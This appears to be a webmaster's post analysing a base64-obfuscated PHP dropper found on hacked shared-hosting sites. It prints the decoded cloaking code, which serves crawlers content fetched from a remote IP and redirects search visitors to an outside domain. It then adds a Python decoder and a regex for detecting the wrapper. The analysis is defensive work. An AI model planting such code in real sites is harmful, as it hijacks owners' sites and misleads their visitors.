We found this on a couple of sites with our (now dropped) iPowerWeb shared host. The code was typically dropped into a file located off the root directory like "/xyzzy/index.php".
<?eval(base64_decode("JGs9MTA3OyRtPWV4cGxvZGUoIjsiLCI3OTsxOTs5MDs4Njs3OTs..."));?>
Changing "eval" to "echo" in order to see what is being executed:
    // Build "<host><path>" for the directory the dropped index.php sits in
    $x1=$_SERVER["HTTP_HOST"];
    $x3=$_SERVER["SCRIPT_NAME"];
    list($path,$z)=explode("index.php",$x3);
    $m="$x1"."$path";
    // Search-engine crawlers are served content fetched from the remote server
    if (stristr($HTTP_USER_AGENT,"googlebot")||stristr($HTTP_USER_AGENT,"yahoo")||$bot){
        ob_start("ob_gzhandler");
        $url="http://74.55.31.126/pt/index.php?d=$x1&p=$path&name=$name";
        $ch = curl_init();
        curl_setopt ($ch, CURLOPT_URL, $url);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch, CURLOPT_TIMEOUT, 15);
        curl_setopt ($ch, CURLOPT_ENCODING , "gzip");
        $result=curl_exec ($ch);
        curl_close ($ch);
        echo $result;
    }else{
        // Visitors referred by a search engine are redirected off-site; everyone else gets /404
        $good=0;
        if (stristr($_SERVER["HTTP_REFERER"],"google"))$good=1;
        if (stristr($_SERVER["HTTP_REFERER"],"yahoo"))$good=1;
        if (stristr($_SERVER["HTTP_REFERER"],"aol"))$good=1;
        if ($good){
            header("Location: http://hola-aloha.net/in.php?s=$x1&ver=$version");
        }else{
            header("Location: /404");
        }
    }
The code allowed the hacker to arbitrarily create backlinks that appeared to be hosted on our site. Quite ingenious.
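The same unpacking can be done offline without running anything from the dropped file. The Python below is an added example, not code from the original post: it pulls the base64 argument out of the dropper, decodes it, and then decodes the numeric second layer that the visible part of the payload reveals ($k=107 followed by a semicolon-separated number list). XOR with $k is an assumption, chosen because it reproduces the first characters of the decoded code shown above; SAMPLE is the truncated payload prefix from the post, and all function names are illustrative.

```python
import base64
import re

# Dropper shape from the post: eval(base64_decode("..."))
DROPPER = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)', re.I)
# Second layer seen after base64 decoding: $k=<key>;$m=explode(";","n;n;n;...
NUMERIC = re.compile(r'\$k=(\d+);\$m=explode\(";","([0-9;]*)')

# Truncated payload prefix as it appears in the post (the rest is not available).
SAMPLE = '<?eval(base64_decode("JGs9MTA3OyRtPWV4cGxvZGUoIjsiLCI3OTsxOTs5MDs4Njs3OTs"));?>'

def extract_payloads(php_source):
    """Return each base64 argument passed to eval(base64_decode(...))."""
    return DROPPER.findall(php_source)

def decode_base64_layer(payload):
    """Decode without executing; tolerate truncated or unpadded input."""
    payload = payload.rstrip("=")
    if len(payload) % 4 == 1:  # a lone trailing character encodes no full byte
        payload = payload[:-1]
    payload += "=" * (-len(payload) % 4)
    return base64.b64decode(payload).decode("latin-1")

def decode_numeric_layer(stage1):
    """XOR each listed number with $k (assumed operation, not stated in the post)."""
    match = NUMERIC.search(stage1)
    if not match:
        return None
    key = int(match.group(1))
    numbers = match.group(2).split(";")
    if match.end() == len(stage1):  # list cut off: last item may be partial
        numbers = numbers[:-1]
    return "".join(chr(int(n) ^ key) for n in numbers if n)

def unpack(php_source):
    """Return (stage1, stage2) text for every dropper found in php_source."""
    results = []
    for payload in extract_payloads(php_source):
        stage1 = decode_base64_layer(payload)
        results.append((stage1, decode_numeric_layer(stage1)))
    return results

if __name__ == "__main__":
    for stage1, stage2 in unpack(SAMPLE):
        print("stage 1:", stage1)
        print("stage 2:", stage2)
```

Run over a web root, the DROPPER pattern also works as a quick indicator for other files carrying the same wrapper.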